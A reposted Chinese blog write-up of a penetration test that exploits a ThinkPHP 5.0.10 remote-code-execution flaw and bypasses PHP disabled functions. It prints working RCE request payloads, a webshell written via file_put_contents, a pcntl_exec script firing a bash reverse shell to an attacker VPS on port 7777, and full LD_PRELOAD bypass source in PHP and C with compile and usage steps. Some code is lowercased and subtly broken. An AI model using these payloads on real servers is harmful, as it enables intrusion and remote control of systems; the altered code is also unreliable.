服务器之家:专注于服务器技术及软件下载分享
分类导航

PHP教程|ASP.NET教程|Java教程|ASP教程|编程技术|正则表达式|C/C++|IOS|C#|Swift|Android|VB|R语言|JavaScript|易语言|vb.net|

服务器之家 - 编程语言 - PHP教程 - 一次项目中Thinkphp绕过禁用函数的实战记录

一次项目中Thinkphp绕过禁用函数的实战记录

2021-11-26 15:09天良 PHP教程

这篇文章主要给大家介绍了一次项目中Thinkphp绕过禁用函数的实战记录,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下

前言

在一次渗透测试中,手工找了许久没发现什么东西,抱着尝试的心情打开了xray

果然xray还是挺给力的,一打开网页的时候xray直接就扫描出了thinkphp 5.0.10 rce漏洞

直接使用命令执行payload,结果报出system函数被禁用

?
1
s=whoami&_method=__construct&method=&filter[]=system

一次项目中Thinkphp绕过禁用函数的实战记录

尝试应用其他函数进行利用,经过测试发现call_user_func函数没有被禁用
payload

?
1
s=phpinfo&_method=__construct&method=get&filter[]=call_user_func

可以看到哪些函数被禁用了

一次项目中Thinkphp绕过禁用函数的实战记录

看到assert和include没有被禁用,一开始想写shell进日志然后去利用文件包含,发现并没有任何反应,也不报错。

file_put_contents

又回去看被禁用的函数,发现文件函数没被禁用,可以用file_put_contents函数去写文件
测试写入phpinfo文件

?
1
s=file_put_contents('/www/wwwroot/public/phpinfo.php',base64_decode('pd9wahagjhbhc3m9jf9qt1nuwydhywfhj107zxzhbcgkcgfzcyk7pz4'))&_method=__construct&filter=assert

一次项目中Thinkphp绕过禁用函数的实战记录

写入成功

一次项目中Thinkphp绕过禁用函数的实战记录

写入冰蝎马可以进行文件管理了

一次项目中Thinkphp绕过禁用函数的实战记录

虽然可以进行文件操作了,但还是没法执行命令

一次项目中Thinkphp绕过禁用函数的实战记录

pcntl_exec

想到了比较容易被忽略的命令执行函数pcntl_exec,发现pcntl_exec函数没有被禁用,该函数可以指定一个程序来执行指定文件

先写一个exe.php文件,在文件中指定pcntl_exec的参数(执行运行程序,运行指定文件)

?
1
2
3
4
5
6
7
8
9
<?php
    switch (pcntl_fork()) {
        case 0:
            pcntl_exec('/bin/bash', ['/www/wwwroot/public/exec.sh']);
            exit(0);
        default:
            break;
    }
?>

exec.sh文件写入反弹命令

?
1
bash -i >& /dev/tcp/vpsip/7777 0>&1

浏览器访问exe.php成功反弹shell

一次项目中Thinkphp绕过禁用函数的实战记录

ld_preload 劫持

这次渗透是结束了,这里尝试了另外一种绕过方法,如果遇到pcntl_exec函数也被禁用的情况,可以利用环境变量 ld_preload 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。详细的原理介绍就不赘述了,可以参考这个大哥的文章https://www.meetsec.cn/index.php/archives/44/

这种方法主要是需要上传一个.php和一个由.c程序编译得到共享对象.so文件到服务器

bypass_disablefunc.php

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
    echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
 
    $cmd = $_get["cmd"];
    $out_path = $_get["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
 
    putenv("evil_cmdline=" . $evil_cmdline);
 
    $so_path = $_get["sopath"];
    putenv("ld_preload=" . $so_path);
 
    mail("", "", "", "");
 
    echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
 
    unlink($out_path);
?>

bypass_disablefunc.php提供了三个参数:

  1. cmd 参数,待执行的系统命令(如 whoami)。
  2. outpath 参数,保存命令执行输出结果的文件路径(如 /www/wwwroot/public),便于在页面上显示,另外关于该参数,你应注意 web 是否有读写权限、web 是否可跨目录访问、文件将被覆盖和删除等几点。
  3. sopath 参数,指定劫持系统函数的共享对象的绝对路径(如 /www/wwwroot/bypass_disablefunc_x64.so),另外关于该参数,你应注意 web 是否可跨目录访问到它,最好也传到web根目录下。

bypass_disablefunc.c

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#define _gnu_source
 
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
 
 
extern char** environ;
 
__attribute__ ((__constructor__)) void preload (void)
{
    // get command line options and arg
    const char* cmdline = getenv("evil_cmdline");
 
    // unset environment variable ld_preload.
    // unsetenv("ld_preload") no effect on some
    // distribution (e.g., centos), i need crafty trick.
    int i;
    for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "ld_preload")) {
                    environ[i][0] = '\0';
            }
    }
 
    // executive command
    system(cmdline);
}

这里需要用命令gcc -shared -fpic bypass_disablefunc.c -o bypass_disablefunc_x64.so将 bypass_disablefunc.c编译为共享对象 bypass_disablefunc_x64.so

要根据目标架构编译成不同版本,在 x64 的环境中编译,若不带编译选项则默认为 x64,若要编译成 x86 架构需要加上 -m32 选项。

可以在github上找到上述需要的文件
https://github.com/yangyangwithgnu/bypass_disablefunc_via_ld_preload

这里利用之前的文件管理冰蝎shell将php和so文件上传到服务器web目录
在浏览器访问bypass_disablefunc.php传入参数

?
1
http://www.xxx.com/bypass_disablefunc.php?cmd=ls&outpath=/www/wwwroot%20/public/1.txt&sopath=/www/wwwroot/public/bypass_disablefunc_x64.so

成功执行命令

一次项目中Thinkphp绕过禁用函数的实战记录

总结

到此这篇关于一次项目中thinkphp绕过禁用函数的文章就介绍到这了,更多相关thinkphp绕过禁用函数内容请搜索服务器之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持服务器之家!

原文链接:https://mp.weixin.qq.com/s/U3wUrp50SFPtvpzMwXcmhw

延伸 · 阅读

精彩推荐
  • PHP教程php将字符串转换成16进制的方法

    php将字符串转换成16进制的方法

    这篇文章主要介绍了php将字符串转换成16进制的方法,涉及php中bin2hex函数的使用技巧,非常具有实用价值,需要的朋友可以参考下...

    PHP教程网2412020-09-11
  • PHP教程PHP设计模式之适配器模式代码实例

    PHP设计模式之适配器模式代码实例

    这篇文章主要介绍了PHP设计模式之适配器模式代码实例,本文讲解了目标、角色、应用场景、优势等内容,并给出代码实例,需要的朋友可以参考下...

    PHP教程网2932020-09-22
  • PHP教程浅谈php调用python文件

    浅谈php调用python文件

    这篇文章主要介绍了php调用python文件,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来...

    时光不遇拾光11782021-07-28
  • PHP教程php计算指定目录下文件占用空间的方法

    php计算指定目录下文件占用空间的方法

    这篇文章主要介绍了php计算指定目录下文件占用空间的方法,实例分析了php操作目录及文件的技巧,具有一定参考借鉴价值,需要的朋友可以参考下...

    令狐不聪3492020-09-09
  • PHP教程php 多个变量指向同一个引用($b = &$a)用法分析

    php 多个变量指向同一个引用($b = &$a)用法分析

    这篇文章主要介绍了php 多个变量指向同一个引用($b = &$a)用法,结合实例形式分析了PHP变量引用原理、优缺点及相关操作技巧,需要的朋友可以参考下...

    倾听岁月8892021-09-16
  • PHP教程php防止网站被刷新的方法汇总

    php防止网站被刷新的方法汇总

    这篇文章主要介绍了php防止网站被刷新的方法,实例汇总了常见的PHP防刷新技巧及应用实例,具有不错的参考借鉴价值,需要的朋友可以参考下...

    PHP之家3432020-08-16
  • PHP教程如何利用预加载优化Laravel Model查询详解

    如何利用预加载优化Laravel Model查询详解

    这篇文章主要给大家介绍了关于如何利用预加载优化Laravel Model查询的相关资料,文章通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考...

    godruoyi11052021-06-15
  • PHP教程php对文件进行hash运算的方法

    php对文件进行hash运算的方法

    这篇文章主要介绍了php对文件进行hash运算的方法,涉及针对文件的hash运算技巧,非常具有实用价值,需要的朋友可以参考下...

    不吃皮蛋5902020-09-16